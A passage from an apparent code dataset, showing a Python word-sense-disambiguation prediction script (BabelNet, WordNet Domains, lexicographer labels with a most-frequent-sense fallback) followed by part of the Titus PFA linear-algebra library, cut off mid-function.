list_of_possible_senses_bn_version\n\n\ndef 
create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\nif __name__ == '__main__':\n predict_babelnet(\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'\n , '../output',\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'\n )\n",
"step-5": "from model import WSD\nfrom data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex\nfrom typing import List, Dict, Tuple\nfrom prova import convert_sentence_to_features_no_padding\nimport numpy as np\nimport os\nfrom nltk.corpus import wordnet\n\n\nmfs_counter = 0\n\n\ndef predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print(\">>>> BABELNET PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"babelnet.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n 
prediction_results[index][0][0],\n vocab=vocab_label_bn,\n enable_coarse_grained=1,\n vocab_for_coarse=None)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> WORDNET DOMAINS PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"wndomains.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n 
prediction_results[index][1][0],\n vocab=vocab_label_wndmn,\n enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> LEXICOGRAPHER PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path, resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + \"lexicon.gold.key.txt\"\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path,output_path,\n 
prediction_results[index][2][0],\n vocab= vocab_label_lex,\n enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path : str, resources_path : str) -> Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path+\"/vocabularies/bert_vocab.txt\", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path+\"/saved_model/model_20_2.14.h5\")\n to_return = []\n sentences_xml_elements = etree_data.xpath(\"/*/*/*\")\n for sentence in train:\n feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)\n results = modello.model.predict(\n {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},\n verbose=1\n )\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str,\n frase,\n 
resources_path: str,\n outputh_path: str,\n predictions,\n vocab = None,\n enable_coarse_grained: int = 1,\n vocab_for_coarse = None) -> int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path+\"/mapping/lemma2wn.txt\")\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n # MFS\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)\n\n candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,\n parola.text,\n vocab,\n predictions[index],\n enable_coarse_grained=enable_coarse_grained)\n 
the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n #MFS\n mfs_counter += 1\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + \"/\"+filename, \"a\") as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + \" \" + tupla[1]+\"\\n\")\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = \"wn:\" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else \"factotum\"\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\ndef __type_checker(value: object) -> str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\ndef __decide_pos(pos: str) -> str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = \"n\"\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param 
list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + \"_\" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n\nif __name__ == \"__main__\":\n predict_babelnet(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_wordnet_domains(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_lexicographer(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n",
"step-ids": [
7,
9,
11,
12,
15
]
}
|
[
7,
9,
11,
12,
15
] |
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from titus.fcn import Fcn
from titus.fcn import LibFcn
from titus.signature import Sig
from titus.signature import Sigs
from titus.datatype import *
from titus.errors import *
from titus.util import callfcn, div
import titus.P as P
from functools import reduce
provides = {}  # registry of every function defined in this module, keyed by full PFA name
def provide(fcn):
    # Register a library-function instance under its PFA name (e.g. "la.dot").
    provides[fcn.name] = fcn
prefix = "la."  # namespace prefix shared by all linear-algebra functions below
def np():
    """Return the numpy module, importing it lazily on first use."""
    import numpy as _numpy
    return _numpy
def rowKeys(x):
    """Return the set of row labels of a map-of-maps matrix."""
    return set(x)
def colKeys(x):
    """Return the union of all column labels appearing in any row of x."""
    labels = set()
    for row in x.values():
        labels.update(row)
    return labels
def arraysToMatrix(x):
    """Convert a list-of-lists into a numpy matrix of doubles."""
    numpy = np()
    return numpy.matrix(x, dtype=numpy.double)
def arrayToRowVector(x):
    """Convert a flat list into a numpy column vector (n x 1 matrix).

    Despite the name, the transpose makes this a column, not a row.
    """
    numpy = np()
    return numpy.matrix(x, dtype=numpy.double).T
def rowVectorToArray(x):
    """Flatten a numpy column vector (n x 1 matrix) into a plain Python list."""
    rows = x.T.tolist()
    return rows[0]
def matrixToArrays(x):
    """Convert a numpy matrix back into a nested list-of-lists."""
    nested = x.tolist()
    return nested
def mapsToMatrix(x, rows, cols):
    """Build a dense numpy matrix from a map-of-maps, ordered by the given
    row and column labels; missing cells default to 0.0."""
    numpy = np()
    dense = [[x.get(i, {}).get(j, 0.0) for j in cols] for i in rows]
    return numpy.matrix(dense, dtype=numpy.double)
def mapToRowVector(x, keys):
    """Build a numpy column vector from a map, ordered by ``keys``;
    missing entries default to 0.0."""
    numpy = np()
    values = [x.get(k, 0.0) for k in keys]
    return numpy.matrix(values, dtype=numpy.double).T
def rowVectorToMap(x, keys):
    """Convert a numpy column vector into a map keyed by the given labels."""
    values = x.T.tolist()[0]
    return dict(zip(keys, values))
def matrixToMaps(x, rows, cols):
    """Convert a numpy matrix into a map-of-maps with the given row and
    column labels."""
    out = {}
    for label, values in zip(rows, x.tolist()):
        out[label] = dict(zip(cols, values))
    return out
def raggedArray(x):
    """Return True if the rows of a list-of-lists have unequal lengths."""
    lengths = [len(row) for row in x]
    return max(lengths) != min(lengths)
def raggedMap(x):
    """Return True if the rows of a map-of-maps have differing numbers of
    columns (note: only lengths are compared, not the key sets)."""
    distinct_lengths = {len(row) for row in x.values()}
    return len(distinct_lengths) != 1
class MapApply(LibFcn):
    """PFA function ``la.map``: apply a scalar function to every cell of a
    matrix.

    Matrices are represented either as arrays of arrays or as maps of maps
    of doubles; the result uses the same representation as the input.
    """
    name = prefix + "map"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"fcn": P.Fcn([P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"fcn": P.Fcn([P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24000
    def __call__(self, state, scope, pos, paramTypes, x, fcn):
        # Array-of-arrays representation: apply fcn to each cell, row by row.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x]
        # Map-of-maps representation: preserve row and column keys.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
            return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for j, xj in list(xi.items()))) for i, xi in list(x.items()))
provide(MapApply())
class Scale(LibFcn):
    """PFA function ``la.scale``: multiply a vector or matrix by a scalar.

    Accepts all four representations declared in ``sig`` (array vector,
    array-of-arrays matrix, map vector, map-of-maps matrix) and returns
    the same representation.
    """
    name = prefix + "scale"
    sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"alpha": P.Double()}], P.Array(P.Double())),
                Sig([{"x": P.Array(P.Array(P.Double()))}, {"alpha": P.Double()}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Double())}, {"alpha": P.Double()}], P.Map(P.Double())),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"alpha": P.Double()}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24010
    def __call__(self, state, scope, pos, paramTypes, x, alpha):
        # Array-of-arrays matrix.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
            return [[xj * alpha for xj in xi] for xi in x]
        # Array vector.
        elif isinstance(x, (list, tuple)):
            return [xi * alpha for xi in x]
        # Map-of-maps matrix.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):
            return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items()))) for i, xi in list(x.items()))
        # Map vector.
        else:
            return dict((i, xi * alpha) for i, xi in list(x.items()))
provide(Scale())
class ZipMap(LibFcn):
    """PFA function ``la.zipmap``: combine two matrices cell-by-cell with a
    two-argument function.

    Array matrices must have identical dimensions (raises error code
    24020 + 0 otherwise); map matrices are unioned over row/column keys,
    with missing cells treated as 0.0.
    """
    name = prefix + "zipmap"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}, {"fcn": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}, {"fcn": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24020
    def __call__(self, state, scope, pos, paramTypes, x, y, fcn):
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
           isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
            if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
                raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
             isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
            # Union of keys from both operands; absent cells default to 0.0.
            rows = rowKeys(x).union(rowKeys(y))
            cols = colKeys(x).union(colKeys(y))
            return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {}).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for i in rows)
provide(ZipMap())
class Add(LibFcn):
    """PFA function ``la.add``: elementwise sum of two vectors or matrices.

    Array forms must have identical dimensions (raises error code
    24030 + 0 otherwise); map forms are unioned over keys, with missing
    cells treated as 0.0.
    """
    name = prefix + "add"
    sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
                Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Double())}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24030
    def __call__(self, state, scope, pos, paramTypes, x, y):
        # Array matrix + array matrix.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
           isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
            if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
                raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            return [[xj + yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
        # Array vector + array vector.
        elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):
            if len(x) != len(y):
                raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            return [xi + yi for xi, yi in zip(x, y)]
        # Map matrix + map matrix: union of keys, missing cells are 0.0.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
             isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
            rows = rowKeys(x).union(rowKeys(y))
            cols = colKeys(x).union(colKeys(y))
            return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)
        # Map vector + map vector.
        else:
            rows = rowKeys(x).union(rowKeys(y))
            return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)
provide(Add())
class Sub(LibFcn):
    """PFA function ``la.sub``: elementwise difference (x - y) of two
    vectors or matrices.

    Array forms must have identical dimensions (raises error code
    24040 + 0 otherwise); map forms are unioned over keys, with missing
    cells treated as 0.0.
    """
    name = prefix + "sub"
    sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
                Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Double())}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24040
    def __call__(self, state, scope, pos, paramTypes, x, y):
        # Array matrix - array matrix.
        if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
           isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
            if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
                raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            return [[xj - yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
        # Array vector - array vector.
        elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):
            if len(x) != len(y):
                raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            return [xi - yi for xi, yi in zip(x, y)]
        # Map matrix - map matrix: union of keys, missing cells are 0.0.
        elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
             isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
            rows = rowKeys(x).union(rowKeys(y))
            cols = colKeys(x).union(colKeys(y))
            return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)
        # Map vector - map vector.
        else:
            rows = rowKeys(x).union(rowKeys(y))
            return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)
provide(Sub())
class Dot(LibFcn):
    """PFA function ``la.dot``: matrix-matrix or matrix-vector product.

    Unlike the other functions in this module, the representation is
    dispatched on the *declared* type of the second argument
    (``paramTypes[1]``), not on the runtime values.  Raises
    errcodeBase + 0 for misaligned operands, + 1 for empty dimensions,
    and + 2 if any entry is NaN or infinite.
    """
    name = prefix + "dot"
    sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
                Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
                Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
    errcodeBase = 24050
    def __call__(self, state, scope, pos, paramTypes, x, y):
        if paramTypes[1]["type"] == "array":
            if isinstance(paramTypes[1]["items"], dict) and paramTypes[1]["items"]["type"] == "array":
                # array matrix-matrix case
                bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \
                      any(any(math.isnan(z) or math.isinf(z) for z in row) for row in y)
                xmat = arraysToMatrix(x)
                ymat = arraysToMatrix(y)
                if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
                    raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
                try:
                    if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
                    return matrixToArrays(np().dot(xmat, ymat))
                except ValueError:
                    # numpy raises ValueError when the inner dimensions disagree.
                    raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
            else:
                # array matrix-vector case
                bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \
                      any(math.isnan(z) or math.isinf(z) for z in y)
                xmat = arraysToMatrix(x)
                ymat = arrayToRowVector(y)
                if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
                    raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
                try:
                    if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
                    return rowVectorToArray(np().dot(xmat, ymat))
                except ValueError:
                    # numpy raises ValueError when the inner dimensions disagree.
                    raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
        elif paramTypes[1]["type"] == "map":
            if isinstance(paramTypes[1]["values"], dict) and paramTypes[1]["values"]["type"] == "map":
                # map matrix-matrix case
                bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \
                      any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(y.values()))
                # Inner dimension is the union of x's columns and y's rows, so
                # map operands can never be misaligned; missing cells are 0.0.
                rows = list(rowKeys(x))
                inter = list(colKeys(x).union(rowKeys(y)))
                cols = list(colKeys(y))
